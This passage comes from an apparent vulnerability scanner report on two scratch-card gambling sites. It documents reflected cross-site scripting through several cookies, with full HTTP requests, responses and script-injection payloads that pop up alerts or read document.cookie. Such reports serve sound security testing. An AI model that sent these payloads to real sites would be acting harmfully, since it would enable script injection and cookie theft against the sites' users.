
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/argos/ HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG6154e><script>alert(1)</script>de94baa06bd; currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.3.8.1305550702422; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:58:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n43q1ra7ukm7bjt67kuhs994a1; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:58:43 GMT; path=/
Set-Cookie: lang=ENG6154e%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ede94baa06bd; expires=Wed, 15-Jun-2011 12:58:43 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:58:43 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:43 GMT; path=/
Content-Type: text/html
Content-Length: 11466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD737fc";alert(document.cookie)//814391c7445', 'ENG6154e><script>alert(1)</script>de94baa06bd', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.188. http://scratch.co.uk/terms/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/terms/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df291"><script>alert(1)</script>e30d2cf3290 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /terms/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243df291"><script>alert(1)</script>e30d2cf3290; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243df291%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee30d2cf3290; expires=Wed, 15-Jun-2011 12:26:28 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:28 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:28 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:28 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243df291"><script>alert(1)</script>e30d2cf3290');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.189. http://scratch.co.uk/terms/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/terms/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 252c4"><script>alert(1)</script>6054300a549 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /terms/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP252c4"><script>alert(1)</script>6054300a549;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:48 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:48 GMT; path=/
Set-Cookie: currency=GBP252c4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6054300a549; expires=Wed, 15-Jun-2011 12:30:48 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:48 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP252c4"><script>alert(1)</script>6054300a549', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.190. http://scratch.co.uk/terms/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/terms/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93c11"><script>alert(1)</script>fbc71e06f6a was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /terms/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG93c11"><script>alert(1)</script>fbc71e06f6a; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:40 GMT; path=/
Set-Cookie: lang=ENG93c11%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efbc71e06f6a; expires=Wed, 15-Jun-2011 12:30:40 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:40 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:40 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG93c11"><script>alert(1)</script>fbc71e06f6a', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.191. http://scratch.co.uk/vis-club/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/vis-club/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb957"><script>alert(1)</script>c680567ffc0 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /vis-club/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243eb957"><script>alert(1)</script>c680567ffc0; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243eb957%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec680567ffc0; expires=Wed, 15-Jun-2011 12:25:36 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:36 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:36 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:36 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243eb957"><script>alert(1)</script>c680567ffc0');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.192. http://scratch.co.uk/vis-club/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/vis-club/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49be4"><script>alert(1)</script>0ec361e9ffc was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /vis-club/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP49be4"><script>alert(1)</script>0ec361e9ffc;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:09 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:09 GMT; path=/
Set-Cookie: currency=GBP49be4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0ec361e9ffc; expires=Wed, 15-Jun-2011 12:30:09 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP49be4"><script>alert(1)</script>0ec361e9ffc', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.193. http://scratch.co.uk/vis-club/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/vis-club/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa1c0"><script>alert(1)</script>3da4608a5ce was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /vis-club/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGaa1c0"><script>alert(1)</script>3da4608a5ce; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:22 GMT; path=/
Set-Cookie: lang=ENGaa1c0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3da4608a5ce; expires=Wed, 15-Jun-2011 12:29:22 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:22 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:22 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGaa1c0"><script>alert(1)</script>3da4608a5ce', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.194. http://scratch.co.uk/winners/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/winners/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0b54"><script>alert(1)</script>fb6829eaf9d was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /winners/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243a0b54"><script>alert(1)</script>fb6829eaf9d; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243a0b54%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efb6829eaf9d; expires=Wed, 15-Jun-2011 12:26:04 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:04 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:04 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:04 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 28322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243a0b54"><script>alert(1)</script>fb6829eaf9d');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.195. http://scratch.co.uk/winners/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/winners/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a954"><script>alert(1)</script>f1743b981a4 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /winners/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP3a954"><script>alert(1)</script>f1743b981a4;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:22 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:22 GMT; path=/
Set-Cookie: currency=GBP3a954%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef1743b981a4; expires=Wed, 15-Jun-2011 12:30:22 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:22 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 28427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP3a954"><script>alert(1)</script>f1743b981a4', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.196. http://scratch.co.uk/winners/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/winners/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e14a"><script>alert(1)</script>52273c4ddef was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /winners/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG4e14a"><script>alert(1)</script>52273c4ddef; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: lang=ENG4e14a%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E52273c4ddef; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 28429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG4e14a"><script>alert(1)</script>52273c4ddef', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.197. http://www.bigmoneyscratch.com/AboutUs.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ead3"-alert(1)-"ff7a7bf1508 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM9ead3"-alert(1)-"ff7a7bf1508; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:17 GMT; path=/
Set-Cookie: BO=FM9ead3"-alert(1)-"ff7a7bf1508; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:17 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:17 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM9ead3"-alert(1)-"ff7a7bf1508";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.198. http://www.bigmoneyscratch.com/AboutUs.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13162"-alert(1)-"7dddb484a1 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

